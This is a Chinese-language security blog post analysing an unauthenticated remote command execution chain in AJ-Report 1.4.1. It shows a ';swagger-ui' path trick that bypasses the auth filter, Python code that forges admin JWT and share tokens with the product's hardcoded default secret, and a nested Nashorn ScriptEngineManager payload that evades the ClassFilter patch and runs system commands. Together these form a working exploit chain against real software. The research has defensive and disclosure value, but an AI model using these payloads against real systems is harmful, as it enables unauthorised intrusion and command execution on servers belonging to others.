<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="Squirt1e"><meta name="renderer" content="webkit"><meta name="copyright" content="Squirt1e"><meta name="keywords" content="Squirt1e's blog"><meta name="description" content="一名网络安全从业人员的博客"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>AJ-REPORT 1.4.1未授权远程命令修复绕过 · Squirt1e's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/avatar.jpg"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">Squirt1e</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="http://114.67.236.137/pic/5634a4a770a0497be3f36bdc068c6f7.jpg" target="_black">美</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Squirt1e's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">AJ-REPORT 1.4.1未授权远程命令修复绕过</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2024-05-10</span></span><span class="post-intro-tags"><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="漏洞挖掘"> 漏洞挖掘</a><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="安全研究"> 安全研究</a></span></div><div class="post-intro-read"><span> Word count: <span class="post-count">1.6k</span> | Reading time: <span class="post-count">6</span>min</span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><blockquote>
<p>文章首发于先知社区，<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/14460">传送门</a>。</p>
</blockquote>
<h4 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a>TL;DR</h4><p>前几天在公众号看到<code>AJ-Report</code>未授权远程命令执行，这个洞还挺通杀的。今天看了下命令执行似乎已经修复了，但是这里的<code>patch</code>没啥用。而且最关键的鉴权绕过没修，其实鉴权修复了也会有默认<code>key</code>导致鉴权绕过的问题。文末给出了利用工具。</p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><h5 id="鉴权绕过"><a href="#鉴权绕过" class="headerlink" title="鉴权绕过"></a>鉴权绕过</h5><p>这个系统的接口绝大部分都需要登陆，需要绕一下。</p>
<p>鉴权在<code>TokenFilter</code>：</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240510135030938.png" alt="image-20240510135030938"></p>
<p>经典的通过<code>request.getRequestURI()</code>拿到<code>uri</code>，后面如果<code>uri</code>包含<code>swagger-ui</code>直接放行。</p>
<p>因为是拿的<code>URI</code>，没有参数信息所以没法用<code>?swagger-ui</code>绕。</p>
<p>但可以用<code>;swagger-ui</code>绕过，因为<code>parsePathParameters:950, CoyoteAdapter (org.apache.catalina.connector)</code>这里会取分号作为<code>pathParamStart</code>。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240510154835262.png" alt="image-20240510154835262"></p>
<p>而<code>pathParamEnd</code>这里会取<code>/</code>作为结尾。最后截断中间的字符串，也就是说<code>/a;b/c</code>最终会解析为<code>/a/c</code></p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715327731929.png" alt="1715327731929"></p>
<p>所以用<code>/dataSetParam;swagger-ui/verification</code>就能请求到后端接口了。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715327932734.png" alt="1715327932734"></p>
<h5 id="另一处鉴权绕过（默认key）"><a href="#另一处鉴权绕过（默认key）" class="headerlink" title="另一处鉴权绕过（默认key）"></a>另一处鉴权绕过（默认key）</h5><p>如果<code>swagger-ui</code>放行那里被修复了怎么办呢？可以看到后续会校验<code>token</code>。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715402625974.png" alt="1715402625974"></p>
<p>校验<code>token</code>类也是安吉自己写的，给<code>jwt payload</code>加了四个<code>key-value pairs</code>。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">public</span> String <span class="token function">createToken</span><span class="token punctuation">(</span>String username<span class="token punctuation">,</span> String uuid<span class="token punctuation">,</span> Integer type<span class="token punctuation">,</span> String tenantCode<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    String token <span class="token operator">=</span> JWT<span class="token punctuation">.</span><span class="token function">create</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">withClaim</span><span class="token punctuation">(</span><span class="token string">"username"</span><span class="token punctuation">,</span> username<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">withClaim</span><span class="token punctuation">(</span><span class="token string">"uuid"</span><span class="token punctuation">,</span> uuid<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">withClaim</span><span class="token punctuation">(</span><span class="token string">"type"</span><span class="token punctuation">,</span> type<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">withClaim</span><span class="token punctuation">(</span><span class="token string">"tenant"</span><span class="token punctuation">,</span> tenantCode<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">sign</span><span class="token punctuation">(</span>Algorithm<span class="token punctuation">.</span><span class="token function">HMAC256</span><span class="token punctuation">(</span><span class="token keyword">this</span><span class="token punctuation">.</span>gaeaProperties<span class="token punctuation">.</span><span class="token function">getSecurity</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getJwtSecret</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> token<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">public</span> String <span class="token function">getUsername</span><span class="token punctuation">(</span>String token<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    Claim claim <span class="token operator">=</span> <span class="token punctuation">(</span>Claim<span class="token punctuation">)</span><span class="token keyword">this</span><span class="token punctuation">.</span><span class="token function">getClaim</span><span class="token punctuation">(</span>token<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">get</span><span class="token punctuation">(</span><span class="token string">"username"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> claim <span class="token operator">==</span> null <span class="token operator">?</span> null <span class="token operator">:</span> claim<span class="token punctuation">.</span><span class="token function">asString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>重点来了，通过<code>this.gaeaProperties.getSecurity().getJwtSecret()</code>拿到密钥。</p>
<p><code>jwt</code>密钥在<code>GaeaProperties$Security</code>类里，而<code>setJwtSecret</code>方法没有被调用过，因此<code>key</code>是默认的。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240511125152829.png" alt="image-20240511125152829"></p>
<p>伪造<code>jwt</code>即可。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">getFakeToken</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token punctuation">{</span>
        <span class="token string">"type"</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>
        <span class="token string">"uuid"</span><span class="token punctuation">:</span> <span class="token string">"627750b8be86421d94facec7e4dba555"</span><span class="token punctuation">,</span>
        <span class="token string">"tenant"</span><span class="token punctuation">:</span> <span class="token string">"tenantCode"</span><span class="token punctuation">,</span>
        <span class="token string">"username"</span><span class="token punctuation">:</span> <span class="token string">"admin"</span>
    <span class="token punctuation">}</span>
    fakeToken <span class="token operator">=</span> jwt<span class="token punctuation">.</span>encode<span class="token punctuation">(</span>payload<span class="token punctuation">,</span><span class="token string">'anji_plus_gaea_p@ss1234'</span><span class="token punctuation">,</span>algorithm<span class="token operator">=</span><span class="token string">'HS256'</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> fakeToken
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>通过校验。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715404334246.png" alt="1715404334246"></p>
<p>光伪造<code>token</code>还不够。后面还有个登陆缓存验证，缓存逻辑具体可参考<code>/accessUser/login</code>路由逻辑。<code>token</code>的时效是1小时，如果远程一小时内没有<code>admin</code>登录过那么缓存就会失效。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715404399333.png" alt="1715404399333"></p>
<p>但是看到这里出现了转机，接下来会校验<code>shareToken</code>，如果<code>reportCodeList.stream().noneMatch(uri::contains)</code>，也就是说<code>uri</code>包含<code>reportCode</code>的话就返回<code>false</code>。而<code>shareToken</code>是从<code>Share-Token</code>请求头取的。</p>
<pre class="line-numbers language-java"><code class="language-java">List<span class="token operator">&lt;</span>String<span class="token operator">></span> reportCodeList <span class="token operator">=</span> JwtUtil<span class="token punctuation">.</span><span class="token function">getReportCodeList</span><span class="token punctuation">(</span>shareToken<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>uri<span class="token punctuation">.</span><span class="token function">endsWith</span><span class="token punctuation">(</span><span class="token string">"/reportDashboard/getData"</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token operator">!</span>uri<span class="token punctuation">.</span><span class="token function">endsWith</span><span class="token punctuation">(</span><span class="token string">"/reportExcel/preview"</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> reportCodeList<span class="token punctuation">.</span><span class="token function">stream</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">noneMatch</span><span class="token punctuation">(</span>uri<span class="token operator">:</span><span class="token operator">:</span>contains<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    ResponseBean responseBean <span class="token operator">=</span> ResponseBean<span class="token punctuation">.</span><span class="token function">builder</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">code</span><span class="token punctuation">(</span><span class="token string">"50014"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">message</span><span class="token punctuation">(</span><span class="token string">"分享链接已过期"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">build</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    response<span class="token punctuation">.</span><span class="token function">getWriter</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">print</span><span class="token punctuation">(</span>JSONObject<span class="token punctuation">.</span><span class="token function">toJSONString</span><span class="token punctuation">(</span>responseBean<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>再看一下<code>shareToken</code>签名，密钥同样硬编码。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240511132508126.png" alt="image-20240511132508126"><br><code>shareToken</code>通过以下方式伪造：</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">getFakeShareToken</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token punctuation">{</span>
        <span class="token string">"shareCode"</span><span class="token punctuation">:</span> <span class="token number">1</span><span class="token punctuation">,</span>
        <span class="token string">"reportCode"</span><span class="token punctuation">:</span> <span class="token string">"/"</span><span class="token punctuation">,</span> <span class="token comment" spellcheck="true">#通用性</span>
        <span class="token string">"exp"</span><span class="token punctuation">:</span> <span class="token number">4070880000</span><span class="token punctuation">,</span>
        <span class="token string">"iat"</span><span class="token punctuation">:</span> <span class="token number">1715402146</span><span class="token punctuation">,</span>
        <span class="token string">"sharePassword"</span><span class="token punctuation">:</span> <span class="token number">1</span>
    <span class="token punctuation">}</span>
    fakeShareToken <span class="token operator">=</span> jwt<span class="token punctuation">.</span>encode<span class="token punctuation">(</span>payload<span class="token punctuation">,</span>JWT_SECRET<span class="token punctuation">,</span>algorithm<span class="token operator">=</span><span class="token string">'HS256'</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> fakeShareToken
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>伪造完<code>shareToken</code>就可以访问接口了。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715405171916.png" alt="1715405171916"></p>
<h5 id="nashorn引擎执行表达式绕过"><a href="#nashorn引擎执行表达式绕过" class="headerlink" title="nashorn引擎执行表达式绕过"></a>nashorn引擎执行表达式绕过</h5><p>漏洞在<code>\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java</code>中的<code>/verification</code>路由，可以看到会调用<code>verification</code>方法。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240510094647181.png" alt="image-20240510094647181"></p>
<p>跟进<code>verification</code>方法，该方法调用了<code>engine.eval</code>执行一段表达式。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240510094951944.png" alt="image-20240510094951944"></p>
<p>而<code>engine</code>针对<code>CNVD-2024-15077</code>做了<code>PATCH</code>。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240510095042142.png" alt="image-20240510095042142"></p>
<p>看下<code>diff</code>，加了<code>ClassFilter</code>，过滤了命令执行的三个类。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715307362768.png" alt="1715307362768"></p>
<p>不太了解这个防御逻辑是啥，先尝试打断点看看是什么逻辑：</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715307603132.png" alt="1715307603132"></p>
<p>到这里有个<code>classFilter</code>。调了个寂寞，还是看看怎么<code>ban</code>掉类的逻辑吧。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715307815270.png" alt="1715307815270"></p>
<p>先用原版<code>payload</code>打一下，简单解释下，流传在网上的<code>payload</code>定义了<code>verification</code>函数是因为执行完<code>js</code>后会调用<code>js</code>中的<code>verification</code>函数，随后将执行结果返回。<code>verification</code>函数就是常规的调用<code>java.lang.ProcessBuilder(&#39;whoami&#39;).start()</code>执行命令。</p>
<pre class="line-numbers language-js"><code class="language-js"><span class="token keyword">function</span> <span class="token function">verification</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">{</span><span class="token keyword">var</span> se<span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">javax<span class="token punctuation">.</span>script<span class="token punctuation">.</span>ScriptEngineManager</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token keyword">var</span> r <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>ProcessBuilder</span><span class="token punctuation">(</span><span class="token string">'whoami'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getInputStream</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>result<span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span>BufferedReader</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span>InputStreamReader</span><span class="token punctuation">(</span>r<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>ss<span class="token operator">=</span><span class="token string">''</span><span class="token punctuation">;</span><span class="token keyword">while</span><span class="token punctuation">(</span><span class="token punctuation">(</span>line <span class="token operator">=</span> result<span class="token punctuation">.</span><span class="token function">readLine</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">{</span>ss<span class="token operator">+</span><span class="token operator">=</span>line<span class="token punctuation">}</span><span class="token punctuation">;</span><span class="token keyword">return</span> ss<span class="token punctuation">;</span><span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>执行失败，提示找不到这个类。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715308365531.png" alt="1715308365531"></p>
<p>打异常断点看调用栈：</p>
<pre class="line-numbers language-java"><code class="language-java">classNotFound<span class="token operator">:</span><span class="token number">162</span><span class="token punctuation">,</span> <span class="token function">NativeJavaPackage</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>runtime<span class="token punctuation">)</span>
invokeStatic_L_V<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">282828951</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$DMH<span class="token punctuation">)</span>
reinvoke<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">1395859879</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$BMH<span class="token punctuation">)</span>
dontInline<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">1043162593</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$reinvoker<span class="token punctuation">)</span>
guard<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">1912131086</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$MH<span class="token punctuation">)</span>
linkToCallSite<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">23493645</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$MH<span class="token punctuation">)</span>
verification<span class="token operator">:</span><span class="token number">1</span><span class="token punctuation">,</span> Script$Recompilation$<span class="token number">4</span>$27A$\<span class="token operator">^</span>eval\<span class="token function">_</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>scripts<span class="token punctuation">)</span>
invokeStatic_L3_L<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">246550802</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$DMH<span class="token punctuation">)</span>
invokeExact_MT<span class="token operator">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token function">664302677</span> <span class="token punctuation">(</span>java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>invoke<span class="token punctuation">.</span>LambdaForm$MH<span class="token punctuation">)</span>
invoke<span class="token operator">:</span><span class="token number">639</span><span class="token punctuation">,</span> <span class="token function">ScriptFunctionData</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>runtime<span class="token punctuation">)</span>
invoke<span class="token operator">:</span><span class="token number">494</span><span class="token punctuation">,</span> <span class="token function">ScriptFunction</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>runtime<span class="token punctuation">)</span>
apply<span class="token operator">:</span><span class="token number">393</span><span class="token punctuation">,</span> <span class="token function">ScriptRuntime</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>runtime<span class="token punctuation">)</span>
callMember<span class="token operator">:</span><span class="token number">199</span><span class="token punctuation">,</span> <span class="token function">ScriptObjectMirror</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>api<span class="token punctuation">.</span>scripting<span class="token punctuation">)</span>
invokeImpl<span class="token operator">:</span><span class="token number">386</span><span class="token punctuation">,</span> <span class="token function">NashornScriptEngine</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>api<span class="token punctuation">.</span>scripting<span class="token punctuation">)</span>
invokeFunction<span class="token operator">:</span><span class="token number">190</span><span class="token punctuation">,</span> <span class="token function">NashornScriptEngine</span> <span class="token punctuation">(</span>jdk<span class="token punctuation">.</span>nashorn<span class="token punctuation">.</span>api<span class="token punctuation">.</span>scripting<span class="token punctuation">)</span>
verification<span class="token operator">:</span><span class="token number">106</span><span class="token punctuation">,</span> DataSetParamServiceImpl
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>都是匿名函数，感觉不太能<code>debug</code>。。</p>
<p>经过一番检索发现此处针对<code>nashorn</code>的安全过滤是<code>JEP202</code>，还是看文档吧：<a target="_blank" rel="noopener" href="https://openjdk.org/jeps/202%E3%80%82">https://openjdk.org/jeps/202。</a></p>
<pre class="line-numbers language-apl"><code class="language-apl">Provide a Java class<span class="token function">-</span>access filtering interface<span class="token function">,</span> ClassFilter<span class="token function">,</span> that can be implemented by Java applications that use Nashorn<span class="token dyadic-operator operator">.</span>
提供一个 Java 类访问过滤接口 ，ClassFilter可以由使用 Nashorn 的 Java 应用程序实现。


Nashorn will query a provided instance of the ClassFilter interface before accessing any Java class from a script in order to determine whether the access is allowed<span class="token dyadic-operator operator">.</span> This will occur whether or not a security manager is present<span class="token dyadic-operator operator">.</span>
Nashorn 将在从脚本访问任何 Java 类之前查询提供的接口实例ClassFilter，以确定是否允许访问。无security manager是否存在，都会发生这种情况。

A script should not be able to subvert restrictions by a class filter in any way<span class="token function">,</span> not even by using Java's reflection APIs<span class="token dyadic-operator operator">.</span>
脚本不应该能够以任何方式破坏类过滤器的限制，即使使用 Java 的反射 API 也不行。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>如果存在类过滤器，即使不存在<code>security manager</code>，<code>Nashorn</code> 也不让你用反射。如果反射可用那么使用类过滤器就没有意义了，因为可以使用反射来绕过类过滤器。尝试了一下反射确实不行。</p>
<p>不过参考<code>JEP290</code>大概猜到<code>JEP202</code>也（只）是会过滤类，而不是把命令执行的类阉割了。</p>
<p>所以直接用套娃的方式绕就行，在里面再<code>new</code>一个<code>ScriptEngineManager</code>，然后再<code>eval</code>就行。</p>
<pre class="line-numbers language-js"><code class="language-js"><span class="token keyword">function</span> <span class="token function">verification</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">{</span><span class="token keyword">var</span> se<span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">javax<span class="token punctuation">.</span>script<span class="token punctuation">.</span>ScriptEngineManager</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token keyword">var</span> r <span class="token operator">=</span> se<span class="token punctuation">.</span><span class="token function">getEngineByExtension</span><span class="token punctuation">(</span>\"js\"<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">eval</span><span class="token punctuation">(</span>\"<span class="token keyword">new</span> <span class="token class-name">java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>ProcessBuilder</span><span class="token punctuation">(</span><span class="token string">'whoami'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getInputStream</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>\"<span class="token punctuation">)</span><span class="token punctuation">;</span>result<span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span>BufferedReader</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span>InputStreamReader</span><span class="token punctuation">(</span>r<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>ss<span class="token operator">=</span><span class="token string">''</span><span class="token punctuation">;</span><span class="token keyword">while</span><span class="token punctuation">(</span><span class="token punctuation">(</span>line <span class="token operator">=</span> result<span class="token punctuation">.</span><span class="token function">readLine</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">{</span>ss<span class="token operator">+</span><span class="token operator">=</span>line<span class="token punctuation">}</span><span class="token punctuation">;</span><span class="token keyword">return</span> ss<span class="token punctuation">;</span><span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>执行命令：</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1715318752312.png" alt="1715318752312"></p>
